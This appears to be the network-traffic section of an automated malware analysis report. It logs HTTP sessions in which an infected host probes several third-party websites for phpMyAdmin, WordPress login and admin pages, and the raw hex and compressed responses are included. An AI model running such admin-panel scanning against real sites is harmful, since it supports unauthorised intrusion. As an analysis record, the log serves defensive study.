74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; c
Feb 21, 2024 00:26:12.174657106 CET	1276	IN	Data Raw: 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 Data Ascii: olor: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family: 'Clarkson'; font-
Feb 21, 2024 00:26:12.174701929 CET	1276	IN	Data Raw: 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 31 75 6f 5a 46 46 49 77 58 30 76 79 48 75 45 6a 48 59 48 32 56 6d 72 Data Ascii: LWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMttrEh8jq70i9RKy000O7s/J2
Feb 21, 2024 00:26:12.174720049 CET	268	IN	Data Raw: 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 59 51 4c 64 5a 47 75 47 6a 75 6d 36 37 4f 36 76 73 34 70 7a 6e 4e 4e Data Ascii: xqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+rKdvVh6f1F0Y/zD8P1sa53N
Feb 21, 2024 00:26:12.174822092 CET	1276	IN	Data Raw: 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 Data Ascii: 4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhwp5nBV/y
Feb 21, 2024 00:26:12.174871922 CET	1276	IN	Data Raw: 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a 31 4b 74 35 6c 47 73 76 61 68 79 6a 4d 75 52 56 48 49 4e 4b 49 41 53 Data Ascii: b3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFIiJPGPnKHYK2JjCRhQbe7Dxt
Feb 21, 2024 00:26:12.174916029 CET	1276	IN	Data Raw: 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 2f 4d 30 39 6b 66 67 47 63 66 7a 42 4f 77 72 79 52 61 56 44 73 36 44 Data Ascii: JIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2uE5F6+znJOlnPHleN2O10143
Feb 21, 2024 00:26:12.174968004 CET	1276	IN	Data Raw: 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 78 47 4f 70 71 4a 4c 78 51 45 50 50 38 65 62 6b 68 32 78 6a 78 50 73 Data Ascii: ZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3jzHBrGuPR1YpMFFrB1bJ8us
Feb 21, 2024 00:26:12.175062895 CET	1276	IN	Data Raw: 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 6d 38 78 79 37 34 61 37 52 49 71 32 52 79 68 4c 4c 71 34 76 45 4e 78 Data Ascii: KKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOYMOd3ZMy3lBovUZqA+G9Ip1V
Feb 21, 2024 00:26:12.175143957 CET	1276	IN	Data Raw: 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 59 57 74 62 4f 4d 45 64 72 4b 62 50 65 78 6c 48 77 64 34 48 69 2f 67 Data Ascii: W9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBWNubh73czs77OmucVf3h6/Pn
Feb 21, 2024 00:26:12.263397932 CET	1276	IN	Data Raw: 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 59 36 63 35 53 4e 6e 32 63 68 5a 4c 72 37 35 4d 79 53 4d 55 44 65 44 Data Ascii: /qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMfwYCj9K4ceU8KMt/MiGH+nwo

Session ID	Source IP	Source Port	Destination IP	Destination Port
271	192.168.2.6	59861	13.232.255.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.137459993 CET	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.408027887 CET	415	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Location: https://amsantechnology.com/phpMyAdmin/ Content-Length: 223 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://amsantechnology.com/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
272	192.168.2.6	61009	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.139437914 CET	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.233402014 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/PhpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
273	192.168.2.6	59939	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.142687082 CET	178	OUT	GET /wp-login.php HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.445152998 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:12 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 37 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 Data Ascii: 576<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])), east=+((+!+[])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!!
Feb 21, 2024 00:26:12.445167065 CET	459	IN	Data Raw: 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b Data Ascii: [])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent
Feb 21, 2024 00:26:12.445178032 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
274	192.168.2.6	60925	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.149832010 CET	176	OUT	GET /admin HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.316188097 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
275	192.168.2.6	60911	162.215.240.240	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.158194065 CET	181	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: wefttechnologies.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.378171921 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc b2 eb 76 dc c6 d5 2d fa 5b 7a 8a 12 72 b6 45 7e 21 d0 75 af 02 c5 96 b7 dd 76 3e 65 0f 2a c9 89 1c 66 6f 39 1e 1e 60 a3 ba 1b 36 1a e8 00 68 36 19 45 63 9c d7 38 af 77 9e e4 cc 2a a0 2f a4 28 89 b6 ec 24 4a cc c6 aa 75 99 73 cd 35 cf 9e c4 f1 59 eb a6 5d 51 57 64 5a 66 6d 3b 8e ae 0a b7 59 d5 4d 17 3d 8f e3 e7 8f cf 50 41 86 7f 67 79 71 45 8a 7c 1c b5 d3 a6 2e cb 78 5a 57 5d 56 54 ae 89 b6 bd ef 24 86 19 79 3d ed 6e 56 8e 2c ba 65 89 d8 ff 90 32 ab e6 e3 c8 55 f1 5f 5e 45 fe cd 65 f9 f3 c7 8f ce 96 ae cb c8 74 91 35 ad eb c6 d1 5f be f9 5d 6c a3 dd 7b 95 2d dd 01 43 e2 81 5c 85 ba 4d 91 77 8b 71 ee ae 8a a9 8b 43 70 42 8a aa e8 8a ac 8c db 69 56 ba 31 0b 53 ca a2 fa 91 34 ae 1c 47 ab a6 9e 15 a5 8b c8 a2 71 b3 71 b4 e8 ba 55 7b 3a 1a cd 97 ab 79 52 37 f3 d1 f5 ac 1a 31 df 14 36 0f e8 68 59 b9 a6 bb 19 47 f5 fc b4 ac fd d8 03 0a ae fa 1e 9b 90 d1 8e ec ad 72 bf fe 21 5f 77 d9 16 9d 3b 2c 0f bb 3d 6d ea cb ba 6b 9f ee 2a 9f 56 75 51 e5 ee fa 84 cc a0 6c bd 79 ea 3b d0 e2 cf f2 cd a2 68 89 1f 43 f0 5b af ba 62 59 fc c3 e5 64 53 74 0b d2 2d 1c f9 3f 75 d6 76 e4 d5 d7 7f 24 ab 72 3d 2f 2a 72 c5 59 62 49 4c b6 cb de f8 82 64 5a 2f 47 9b ba c9 57 8d 6b db 51 5f da 8e 5a 57 8f 88 bf de a3 b3 ae e8 4a f7 fc 4f d9 dc 91 aa ee 40 64 5d e5 98 f2 aa 9e 75 9b ac 71 e4 2b 77 e5 ca 7a b5 04 5f 32 a9 97 ab ac ba 21 ff 24 7f 75 b3 8e 7c e3 a6 8b aa 2e eb 79 e1 da b3 51 3f e8 5e 7d 7e aa 9c 7e d2 41 f5 27 93 7b 2f 92 d7 f7 7b 7f 9b 03 b4 9f 39 bc 9d 36 c5 aa 23 de 0a e3 28 5b ad ca 62 9a 75 45 5d 8d ca fc b7 3f b4 75 05 84 32 6b db 71 14 ee 02 df 2e dc 32 8b e7 4d b6 5a 44 cf df 44 ff 33 e0 5f 77 d1 e9 ce ad 7d 89 f7 6b 74 12 fd cf be f2 f4 5b 94 06 bb 9d 46 7f 75 97 af bc cd 90 2c f2 83 be 0d 18 